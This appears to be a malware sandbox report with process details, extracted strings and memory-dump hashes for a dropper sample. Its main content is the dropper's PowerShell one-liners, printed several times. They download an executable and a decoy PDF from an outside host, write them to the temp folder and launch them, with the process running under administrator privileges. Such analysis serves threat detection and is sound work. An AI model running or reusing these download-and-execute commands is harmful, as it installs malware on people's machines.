                                                            Has exited:false

                                                            Target ID:16
                                                            Start time:09:53:34
                                                            Start date:06/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
                                                            Imagebase:0x7ff7b2bb0000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:17
                                                            Start time:09:53:34
                                                            Start date:06/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff620390000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Reset < >
                                                              Strings
                                                              • powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), xrefs: 0040100B
                                                              • powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"), xrefs: 00401016
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1855110810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.1855087718.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000003.00000002.1855131135.0000000000402000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000003.00000002.1855150349.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_lg1wwLsmCX.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")$powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
                                                              • API String ID: 0-3628893888
                                                              • Opcode ID: b02f0958cbd27640d2d698113142b38e593f06e20a30c2ca8041b629a764b5e1
                                                              • Instruction ID: 1508df73bb81b20edbd2416e362e01711401bb553aa95eecbcdc2692af4642b4
                                                              • Opcode Fuzzy Hash: b02f0958cbd27640d2d698113142b38e593f06e20a30c2ca8041b629a764b5e1
                                                              • Instruction Fuzzy Hash: 6C312D31715B408EF7509B66E89038E36B4E788788F50427AEF5DE7BA9EF39C5408744
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1855110810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.1855087718.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000003.00000002.1855131135.0000000000402000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000003.00000002.1855150349.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_lg1wwLsmCX.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8f32582fe5cffa16d1df3f60d06aa6a26514e684bb68eb6197a6cd870405a0d4
                                                              • Instruction ID: 37283cf5fd5ade48ec6d96cf6941fcaa95a322ea8f96897c16376f9f7fb2df5f
                                                              • Opcode Fuzzy Hash: 8f32582fe5cffa16d1df3f60d06aa6a26514e684bb68eb6197a6cd870405a0d4
                                                              • Instruction Fuzzy Hash: 89F0FF61B006009EE700DBB5C4513DE3371A74478CF00057AEE0CB7B99DA38CA018794
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1667280316.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff7c0230000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction ID: 9b425afaaa7e7c3ed29c7e1bdedf7c270348b3f2e54f84b96570d038298faab8
                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction Fuzzy Hash: D501677111CB0D4FD744EF0CE451AA6B7E0FB95364F50056DE58AC3651D736E882CB45
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1845735492.00007FF7C0310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_7ff7c0310000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ae566c5fc9d8a3468a7232aad6b31080ee2c1b6e1dfad12d0f2a294cec5d6e92
                                                              • Instruction ID: 5d2e90023411157aa800a9987b8da286d18a54b8463101eab8588a38b1580d49
                                                              • Opcode Fuzzy Hash: ae566c5fc9d8a3468a7232aad6b31080ee2c1b6e1dfad12d0f2a294cec5d6e92
                                                              • Instruction Fuzzy Hash: D1D10631A0DA895FE795BB2848555B9BBE1FF0A360B4802FED04DCB2D3DB14AC15C7A1
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1843726807.00007FF7C0240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0240000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_7ff7c0240000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 71285e23cba60297ae064e3d48f3161cea21363c46d6d6db04f119cae0a4aecc
                                                              • Instruction ID: 9bf9e8902d31bcef38e1a800f86a81f95bfa910854b8e1b48165ee84a027169e
                                                              • Opcode Fuzzy Hash: 71285e23cba60297ae064e3d48f3161cea21363c46d6d6db04f119cae0a4aecc
                                                              • Instruction Fuzzy Hash: 2DD1C37190DA898FEB56EF6898557E9BFA0FF12320F0441FBC08DC7193DA246949CB91
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1843726807.00007FF7C0240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0240000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_7ff7c0240000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7e7bc5926bbd18bf0f39e470fd6aacdb84a27a3935b4fd3ab6d71f598f9b5012
                                                              • Instruction ID: 2b62f9477515b8d4ee198d46afd1753bf9f322467230cd85f86dbbe73edb224a
                                                              • Opcode Fuzzy Hash: 7e7bc5926bbd18bf0f39e470fd6aacdb84a27a3935b4fd3ab6d71f598f9b5012
                                                              • Instruction Fuzzy Hash: 2EB1CF31D0DA894FEB95EF6898557E8BFA0EF12320F0441EBC08DD7193DE246989CB91
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1843726807.00007FF7C0240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0240000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_7ff7c0240000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                              • Instruction ID: 3049342dcea82a1dae4426f5abbf23768d572ab71b25094a4af8133c578e7b11
                                                              • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                              • Instruction Fuzzy Hash: D601677111CB0D4FD744EF0CE451AA6B7E0FB95364F50056DE58AC3651D736E882CB45